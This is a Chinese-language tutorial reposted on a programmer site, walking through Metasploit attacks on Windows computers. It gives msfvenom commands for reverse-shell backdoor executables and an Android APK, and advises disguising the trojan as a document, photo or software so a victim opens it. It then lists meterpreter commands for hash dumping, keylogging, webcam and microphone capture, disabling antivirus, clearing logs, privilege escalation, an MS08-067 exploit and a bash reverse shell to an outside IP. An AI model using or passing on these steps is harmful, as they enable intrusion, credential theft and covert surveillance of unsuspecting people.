欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页

MSF Exploit入侵电脑实践(Win7/Win10皆可)

程序员文章站 2022-07-15 14:58:24
...

msf exploit入侵电脑(Win7/Win10皆可)

需要的工具:msfvenom . msfconsole (kali里面有)

msfvenom -p windows/meterpreter/reverse_tcp LHOST=本地ip LPORT=本地端口号 –f exe –o 文件名.exe
msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.60.144 LPORT=6666 -f exe -o xss.exe
msfvenom -p android/meterpreter/reverse_tcp LHOST=172.16.60.144 LPORT=8888 R> test.apkMSF Exploit入侵电脑实践(Win7/Win10皆可)
即生成一个后门文件xss.exe

然后继续执行命令:

msfconsole (运行msfconsole)

MSF Exploit入侵电脑实践(Win7/Win10皆可)

msf>use exploit/multi/handler (选择模块)
输入命令show payloads会显示出有效的攻击载荷,比如shell_reverse_tcp。
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
set lhost 加ip地址
set lport 加端口号

MSF Exploit入侵电脑实践(Win7/Win10皆可)

msf exploit(handler) > exploit -z -j (后台执行)
MSF Exploit入侵电脑实践(Win7/Win10皆可)

这样木马就配置好了,然后发给别人(可以伪造成文档,照片,软件等文件骗取别人打开)

发给别人后,等待别人打开xss.exe,打开即上钩了

MSF Exploit入侵电脑实践(Win7/Win10皆可)

msf exploit(handler) > sessions(查看上钩的用户)
MSF Exploit入侵电脑实践(Win7/Win10皆可)

msf exploit(handler) > sessions -i 1(选择需要攻击的用户,这里选择第 1 个)

MSF Exploit入侵电脑实践(Win7/Win10皆可)

进入meterpreter了,即可进行一些相关的木马操作。

background:这个命令是将当前的session放到后台运行,可以在msf中继续其他渗透任务;
sessions:这个命令需要配合上面的background使用,该命令是将后台的会话打开,进行会话操作。
clearev:该命令是用来清除渗透的登录信息的,这个很有用。
hashdump:该命令是一个post模块,需要配合meterpreter使用,这个命令是用来获取目标系统的哈希值的
meterpreter > run post/windows/gather/hashdump
migrate:这个也是一个post模块。可以将meterpreter当前的进程移动到其他指定的进程中,这样做的好处是可以给meterpreter一个相对稳定的运行环境,同时可以很好的躲避杀软。
meterpreter > run post/windows/manage/migrate
webcam_list:列举摄像头。
webcam_snap:通过远程连接目标系统的摄像头。
run killav:关闭对方的杀软,其实关闭杀软也可以进入cmd中手动关闭。


meterpreter
meterpreter是更高级的payload。
纯内存工作模式(不写硬盘),避免被电子取证;加密的通信协议,对传输过程进行加密;易于扩展。

基本命令

	msf > use exploit/windows/smb/ms08_067_netapi

    msf exploit(ms08_067_netapi) > set rhost 192.168.80.148

    msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp

    msf exploit(ms08_067_netapi) > set lhost 192.168.80.163

    msf exploit(ms08_067_netapi) > exploit -j

    msf exploit(ms08_067_netapi) > sessions -i 1  进入meterpreter类型的shell
	meterpreter > background  退出到msf命令提示符下

    meterpreter > lpwd  等价于在kali上输入pwd

    meterpreter > lcd /etc  等价于在kali上输入cd /etc

    meterpreter > run post/windows/gather/smart_hashdump  获取目标主机上用户的hash值

    meterpreter > run post/windows/capture/keylog_recorder  键盘记录

    meterpreter > run killav  结束目标主机上的杀毒软件相关进程

    meterpreter > clearev  清除系统日志

    meterpreter > download boot.ini  下载目标主机上的boot.ini文件

    meterpreter > upload /usr/share/windows-binaries/nc.exe c:\\windows\\system32  上传nc.exe到目标主机上。(注意要使用2个反斜杠)

    meterpreter > dir windows\\system32\\nc.exe

    meterpreter > execute -f nc -nvlp 3333  执行nc.exe

    meterpreter > execute -f "bash -i >& /dev/tcp/104.199.1.1/82 0>&1"

    meterpreter > execute -f bash -i -H

    meterpreter > execute -f cmd.exe -i -H  获得目标主机的shell,-i交互模式,-H隐藏

    meterpreter > execute -H -m -d calc.exe -f wce32.exe -a "-o foo.txt"

    meterpreter > cat foo.txt 
-m 直接从内存中执行攻击端的可执行文件,不在硬盘存储,所以不会留下痕迹,且能避开杀毒软件的查杀;-d 设置需要显示的进程名,可以避开敏感人士的检查。
	meterpreter > getuid  查看当前用户

    meterpreter > getsystem  提权到system用户

    meterpreter > getprivs  查看当前用户具有的权限

    meterpreter > getpid  查看meterpreter注入到了什么进程中

    meterpreter > migrate 1436   更改到pid1436进程中

    meterpreter > getpid  重新使用getpid命令查看

    meterpreter > hashdump  获取目标主机上用户的hash值

    meterpreter > sysinfo  查看目标系统的信息

    meterpreter > kill 188  结束188进程

    meterpreter > shell  获取目标操作系统的shell

    meterpreter > idletime  查看目标主机已经空闲了多长时间

    meterpreter > edit C:\\Windows\\System32\\drivers\\etc\\hosts  编辑hosts文件

    meterpreter > record_mic -d 10 -f /root/桌面/1.mp4  监听麦克风

    meterpreter > load python  加载python插件